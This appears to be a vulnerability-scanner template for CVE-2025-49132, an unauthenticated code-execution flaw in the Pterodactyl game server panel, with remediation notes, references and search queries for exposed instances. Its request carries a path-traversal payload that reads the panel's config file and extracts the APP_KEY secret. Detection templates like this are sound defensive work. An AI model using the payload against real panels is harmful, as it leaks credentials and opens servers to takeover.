id: CVE-2025-49132

info:
  name: Pterodactyl Panel - Remote Code Execution
  severity: critical
  author: darses
  description: |
    Pterodactyl is a free, open-source game server management panel. Using the /locales/locale.json with the locale and namespace query parameters, a malicious actor is able to execute arbitrary code without being authenticated.
  impact: |
    With the ability to execute arbitrary code, this vulnerability can be exploited in an infinite number of ways. It could be used to gain access to the Panel's server, read credentials from the Panel's config (.env or otherwise), extract sensitive information from the database (such as user details [username, email, first and last name, hashed password, ip addresses, etc]), access files of servers managed by the panel, etc.
  remediation: |
    Upgrade to Pterodactyl version 1.11.11+. There are no software workarounds for this vulnerability, but use of an external Web Application Firewall (WAF) could help mitigate this attack.
  reference:
    - https://github.com/pterodactyl/panel/security/advisories/GHSA-24wv-6c99-f843
    - https://github.com/pterodactyl/panel/commit/24c82b0e335fb5d7a844226b08abf9f176e592f0
    - https://github.com/pterodactyl/panel/releases/tag/v1.11.11
  classification:
    epss-score: 0.13105
    epss-percentile: 0.95868
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-49132
    cwe-id: CWE-20
  metadata:
    verified: true
    vendor: pterodactyl
    product: panel
    shodan-query:
      - title:"Pterodactyl"
      - http.favicon.hash:-456405319
      - http.favicon.hash:846001371
      - "Set-Cookie: pterodactyl_session="
    fofa-query:
      - title="Pterodactyl"
      - icon_hash="-456405319"
      - icon_hash="846001371"
      - "Set-Cookie: pterodactyl_session="
  tags: pterodactyl, cve, cve2025, rce, lfi,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '{"app":{"version":'
          - '"key":"base64{{'
        condition: and

    extractors:
      - type: json
        name: APP_KEY
        json:
          - ".[] | .app.key"
# digest: 490a00463044022031b0d265b4d98a2d7135080f2e6d0b9925bb7c8d4e60b9b99a69fd07df92c5d4022070e1024a2e64d174e875aa573fc7b0a774f6841a63ad5f3e94735d7cbf3050fb:922c64590222798bb761d5b6d8e72950